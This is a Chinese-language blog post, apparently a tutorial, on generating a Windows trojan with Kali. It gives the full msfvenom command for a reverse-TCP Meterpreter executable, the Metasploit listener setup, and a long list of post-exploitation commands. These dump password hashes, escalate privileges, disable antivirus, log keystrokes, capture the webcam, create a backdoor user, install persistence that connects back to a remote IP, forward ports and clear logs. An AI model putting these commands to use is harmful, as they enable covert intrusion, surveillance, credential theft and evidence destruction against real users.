• Kali生成windows木马程序


    目录

    一、生成windows执行木马程序

    二、进入msfconsole进行监听目标上线

    三、目标运行木马和后渗透

    四、问题

    Meterpreter session 2 closed. Reason: Died


    一、生成windows执行木马程序

    -p windows/x64/meterpreter/reverse_tcp    //载入64位payload攻击载荷,如需32位把x64去掉即可

    lhost=192.168.2.129                                   //设置本机kali的IP地址(ifconfig查看本机IP地址)

    lport=6666                                                   //设置一个监听端口,可以随意,未被占用即可

    -f exe                                                           //定义此文件的类型为exe

    -o test.exe                                                   //生成木马程序到home目录下且命名为test.exe

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f exe -o test.exe

    二、进入msfconsole进行监听目标上线

    1. msfconsole //进入框架
    2. use exploit/multi/handler //载入模块
    3. set payload windows/x64/meterpreter/reverse_tcp //加载攻击负载核
    4. set lhost 192.168.2.129 //设置本地监听地址,和生成的木马地址一致
    5. set lport 6666 //设置本地监听端口,和生成的木马地址一致
    6. run //开始执行,等待目标上线

    三、目标运行木马和后渗透

    1. Post后渗透模块
    2. sysinfo #查看目标主机系统信息
    3. run scraper #查看目标主机详细信息
    4. run hashdump #导出密码的哈希
    5. load kiwi #加载
    6. ps #查看目标主机进程信息
    7. pwd #查看目标当前目录(windows)
    8. getlwd #查看目标当前目录(Linux)
    9. search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
    10. download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
    11. upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
    12. PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
    13. idletime #查看主机运行时间
    14. getuid #查看获取的当前权限
    15. getsystem #提权
    16. run killav #关闭杀毒软件
    17. screenshot #截图
    18. webcam_list #查看目标主机的摄像头
    19. webcam_snap #拍照
    20. webcam_stream #开视频
    21. execute 参数 -f 可执行文件 #执行可执行程序
    22. run getgui -u hack -p 123 #创建hack用户,密码为123
    23. run getgui -e #开启远程桌面
    24. keyscan_start #开启键盘记录功能
    25. keyscan_dump #显示捕捉到的键盘记录信息
    26. keyscan_stop #停止键盘记录功能
    27. uictl disable keyboard #禁止目标使用键盘
    28. uictl enable keyboard #允许目标使用键盘
    29. uictl disable mouse #禁止目标使用鼠标
    30. uictl enable mouse #允许目标使用鼠标
    31. load #使用扩展库
    32. run #使用扩展库
    33. run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接
    34. 192.168.27的4444端口,缺点是容易被杀毒软件查杀
    35. portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
    36. clearev #清除日志

    四、问题

    Meterpreter session 2 closed. Reason: Died

    原因:

     

     

     

     

  • 相关阅读:
    【Vue 基础知识】控制元素显示隐藏的方法和区别
    简述Tomcat的本质
    SpringMVC:从入门到精通,7篇系列篇带你全面掌握--三.使用SpringMVC完成增删改查
    海康威视二次开发适配安卓电视盒子
    摩尔信使MThings提供丰富的组态控件
    1.MySQL数据库介绍和基础操作
    史上无敌的超级详细的Node Js 环境搭建步骤
    【那些反爬和反反爬】JA3指纹
    winform
    使用Selenium的Python脚本实现自动登录
  • 原文地址:https://blog.csdn.net/qq_51165234/article/details/128154811